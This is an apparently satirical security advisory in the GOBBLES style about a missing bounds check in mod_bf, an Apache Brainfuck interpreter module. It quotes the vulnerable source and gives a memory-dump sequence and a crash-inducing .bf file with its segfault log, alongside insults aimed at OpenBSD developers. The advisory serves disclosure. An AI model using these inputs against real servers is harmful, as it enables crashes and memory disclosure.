++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++GOBBLES+SECURITY+RESEARCH+TEAM+INCORPORATED+++++++++++++++++ ALERT! ALERT! REMOTE ACCESS VIA APACHE BRAINFUCKING! ALERT! ALERT! ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #include "/usr/home/GOBBLES/public_html/alert.bf" ++++++++++[>+++++++<-]>+.<++[>++++<-]>. <++++[>---<-]>-..<+++++[>++<-]>.<++[>-- -<-]>-.<++++[>+++<-]>++.[-].<+++++[>+++ +++<-]>+++. Hehehehe hi everyone its me, GOBBLES. You may have guessed it, but incase not, GOBBLES will tell you that lately GOBBLES Labs Researchers have been taking break from writing OpenBSD remote exploits and doing extensive audit of FreeBSD ports. While having meeting on IRC, GOBBLES did notice this from channel #openbsd which he would like to talk about. yeah, we laugh at gobbles the ettercap exploit, for example, had a bug you could get it to segfault if you supplied a large negative offset Well, Johnny, GOBBLES have lots of laughter at OpenBSD expense. You OpenBSD people claim no remote holes in default installation for so many years but as soon as any default services are enabled from your distribution it become vulnerable but it allow you to continue saying "no holes in default installation" because starting preinstalled service on OpenBSD is a modification from the default installation and such, idiot, you not brave enough to make bold statement and back it up with bold action. GOBBLES do not think newbie OpenBSD developer should be saying he laugh at GOBBLES. Johnny, can you exploit hole in Ettercap exploit? Is there way to gain access from hole in Ettercap exploit in any situation? Johnny, do you know how to code exploit? Go back to you grep -i strcpy stuff for OpenBSD auditing fool and leave real security research to hackers who have a clue on these things. GOBBLES Labs laugh at you and you boyfriend Theo. GOBBLES laugh at openbsd.org developers for ripping netbsd sourcecode and making bad modifications to it to make it vulnerable to OpenBSD developer warez and call it secure, hehehe. Anyhow, you get idea, trying to make GOBBLES look like fool not greatest idea when GOBBLES know of remote holes in OpenBSD. Now all you do is halt GOBBLES disclosure of vulnerabilities and now they not to go public and just get given out to many friends, maybe it will leak to other full disclosure advocate who post it to mailing lists somewhere and you'll then understand in full what fool you are in eyes of GOBBLES. GOBBLES think you should stop looking for integer overflow in he exploits and fix similar problems in you OpenBSD code where it really matter, maybe you like to do useful sourcecode audit and fix bugs before GOBBLES decides to make them go public? PRODUCT ******* Program: $ grep bf /usr/local/etc/apache/httpd.conf LoadModule bf_module libexec/apache/mod_bf.so AddModule mod_bf.c AddHandler bf-handler .bf FreeBSD port: /usr/ports/www/mod_bf Author WWW: http://sourceforge.net/projects/modbf/ Affected versions: 0.1 in FreeBSD ports and the newest 0.2. Affected platforms: Any running Apache 1.3/2.x with mod_bf. People running <= 1.2 are safe since mod_bf not supported on old versions! BACKGROUND ********** hehehe you know what coming next! GOBBLES infamous paste from developer website! A brainf*ck module for the Apache Webserver. * Development Status: 5 - Production/Stable * Environment: Console (Text Based) * Intended Audience: Other Audience * License: GNU General Public License (GPL) * Natural Language: English * Operating System: POSIX * Programming Language: C * Topic: Dynamic Content, Interpreters Registered: 2001-02-25 06:25 Activity Percentile (last week): 0% View project activity statistics Developer Info Project Admins: mkliegl Basically mod_bf is a brainfuck interpreter that interprets .bf files on Apache webserver machines. File pkg-desc in FreeBSD ports says: A brainf*ck module for the Apache Webserver. (hehehe, author too shy to write brainfuck but GOBBLES isn't!) Brainfuck is very simple, lowlevel language that is more powerful than it looks like (much like assembler, Alicia says). From http://www.catseye.mb.ca/esoteric/bf/index.html GOBBLES copy/pastes: First conceived and implemented by Urban Mueller on the Amiga computer system, Brainf*ck is a computer programming language with only eight commands and a really tiny compiler. In a mail at http://w8n.koeln.ccc.de/~drt/mailarchive/friends-of-brainfuck/2001-April/000032.html author Markus Kliegel states: "But yes, tell your friends that brainfuck will definitely replace perl as the scripting language of choice for web applications soon :-)" Now Bugtraq readers probably realize how incredibly dangerous this vulnerability is! Everyone thank GOBBLES! PROBLEM ******* GOBBLES visited author's house on great Internet (modbf.sourceforge.net) and did some clicks until he came to "BUGS" page. Project: Apache Brainf*ck Module Browse Bugs No Items Match Your Criteria WHAT?! No bugs? Impossible! So GOBBLES downloaded possibly bugfree software and started doing heavy auditing. Seconds later GOBBLES had found serious vulnerability that allows penetrator to execute code, modify and dump sensitive httpd memory. mod_bf does not do any kind of boundchecking so people that put .bf-files containing lot's of +-<>. may crash Apache server if file is executed! GOBBLES say this sort of beginner mistake usually only made by Senior OpenBSD developers. mod_brainfuck have been on Freshmeat.net since 2001/03/30 so it now probably in wide use... beware GOBBLES-brainfuck-apache.c is out there! TECHNICAL DETAILS ***************** Relevant bytes from mod_bf.c file: #define ARR_SIZE 100 /* should be 30000, but is a waste of memory IMHO */ static char a[ARR_SIZE]; static int p; ... static int bf_handler(request_rec *r) { ... memset (a, 0, ARR_SIZE); p = 0; ... if (!r->header_only) interpret (c); ... } static void interpret(char *c) { int b; char *d; for (; *c; c++) { switch (*c) { case DEBUG_PR: for (b = 0; b < 10; b++) ap_rprintf (req, "a[%d]: %d" CRLF, b, a[b]); ap_rprintf (req, "a[p]: %d p: %d" CRLF, a[p], p); ap_rflush (req); ap_reset_timeout (req); break; case '+': a[p]++; break; case '-': a[p]--; break; case '>': p++; break; case '<': p--; break; case '.': if (ap_rputc (a[p], req) == EOF) return; ap_rflush (req); ap_reset_timeout (req); break; case ',': if ((a[p] = *req->args) == EOF || a[p] == CR) a[p] = 0; req->args++; ap_reset_timeout (req); break; case '[': /* the idea of the following is borrowed from bfi */ d = ++c; for (b = 1; b && *c; c++) b += (*c == '[' ? 1 : (*c == ']' ? -1 : 0)); if (!b) { *--c = 0; while (a[p]) interpret (d); *c = ']'; } break; } } } a[] is an array of 100 tiny bytes. p is an integer index that points out memorylocations. Can be increased with > or decreased with <. The memory location pointed out by a[p] be modified with + or -. If a skilled brainfuck coder writes something that increase p so p >= 100 or decrease it so p becomes negative, skilled brainfuck coder can set the location pointed out by a[p] to an arbitrary value using + or -. If skilled brainfuck coder would like to dump sensitive memory he could use the '.' command to dump memory like this: <.<.<.<.<.<.<.<. Because newbie programmer doesnt do bounds checks in mod_bf GOBBLES member Alicia was successful with bypassing security software such as StackGuard and FormatGuard gaining uid=nobody by changing some memory locations in she httpd. WORKAROUND ********** Uninstall Apache and choose a better webserver like Roxen (but make sure Roxen is not vulnerable to GOBBLES Advisory #7 !!). Or maybe GOBBLES think just putting some # in appropriate places in httpd.conf will fix this hole (but not others, hehe, new Apache Server advisory coming very soon!). DEMONSTRATION ************* This time GOBBLES choose not to release exploit because 1) Scriptkiddies should not benefit too much from GOBBLES Security 2) Exploit written in elite language brainfuck takes too much space in GOBBLES advisory (GOBBLES trying to save securityfocus.com bandwidth and not contribute to massive ddos originating from site in form of flooding internet with gigabytes of fluffy email!). Example code that crashes poor server $ cat > ~GOBBLES/public_html/bad.bf >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+> +>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+> +>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+> +>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+> +>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+> +>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+> ^D Dec 17 11:16:13 freegobbles /kernel: pid 75035 (httpd), uid 65534: exited on signal 11 CONCLUSION ********** Sometimes, running new software is not the best. Old version of Apache not vulnerable, maybe there a reason atstake.com not updating to current stable version of Apache server too? GOBBLES wonders... GREETS ****** dianora, tsk, snow, carolyn meinel, john vranesevich, steve gibson, kimble, knightmare, emmanuel goldstein, box.sk, @stake, securityfocus, sans.org, blackhat.com, defcon.org, 2600.com, #phrack@efnet, #hackphreak@undernet, bugtraq (thanks aleph1 and david ahmad for devoting your time to a great list), ntbugtraq (russel the love muscle ;D), cert.org, paul vixie, vesselin bontchev, reese witherspoon, kirsten dunst, katie holmes, aleister crowley, manly p hall, franz bardon, dennis ritchie, nietzsche, w. richard stevens, radiohead, george michael, larry wall, beethoven, francis bacon, bruce willis, bruce schneier, alan turing, john von neumann, donald knuth, michael abrash, robert sedgewick, richard simmons, government boy, ralph lauren, kevin mitnick, david koresh, the violent femmes, legions of doom, quentin tarantino, JUPES, security.nnov.ru, dugsong, wayne gretzky, hhp-programming.net, so1o, the HaX0R bRoThErS, nasa.gov, alfred hitchcock, ray bradbury, linux torvalds, alyssa milano, sarah michelle geller, jennifer lopez, catherine zeta jones, robert de niro, plato, leonardo da vinci, nostradamus, adam weishaupt, adema, kmfdm, eliphas levi, john dee, goo goo dolls, savage garden, george bush, john howard, tony blair, ashida kim, andrew tanenbaum, comp.lang.c, solar designer, patanjali, vayu siddhi, deepak chopra, ajna chakra, fuzzy bunny, lockdown, bronc buster, attrition.org, cliff stoll, bill gates, alan cox, george harrison, berkeley.edu, microsoft.com, isox, american mcgee, princess toadstool, ru paul, sharon stone, taeho oh, napster, nocarrier, steve wozniak, captian crunch, tony the tiger, julliette lewis, oliver twist, yakko, wakko, santa claus, the easter bunny, the christmas tree, hacktech.org, mixter and the rest of #darknet/2xs, the planet Pluto, pluto the dog, walt disney, the smurfs, packetstormsecurity.org, chocolate, caramel, marshmallows, rice crispies, rice crispie treats, cousin WOBBLES, rfp, Alan@packetstorm, george bush senior, george w. bush, his drunken daughters, gary coleman, fat albert, rhino9, eEye.com, the djali zwan, digital unix, o'reilly & associates, hwa-security.net, #malvu/efnet, donkey kong, diddy kong, p diddy, mr. peanut, all girls who pose naked on webcam for GOBBLES, mr goldilocks, checkpoint.com, whoever invented deoderant, monkey.org, bono, micheal stipes, clark kent, bruce banner, ssh.com, hacked.cisco.com, thomas edison, steven king, P80 Systems, gnutella, colin powell, Joakim von Braun, #openbsd/efnet (hehe now who laughing?!?!), jnathan/efnet, debian.org, mr. ed, scooby doo, spud mckenzie, sam i am, guy who wrote that bible book, george b. thomas junior, ross l. finney, maurice d. wier, john bobbit, transmeta.com, linus torvalds, naked supermodel in magazines, d'arcy gretzky, deep purple, shampoos that kill head lice, kraft.com (for mac and cheese), george clooney, jonathon swift, plan9 from outer space, and all our friends and family. =)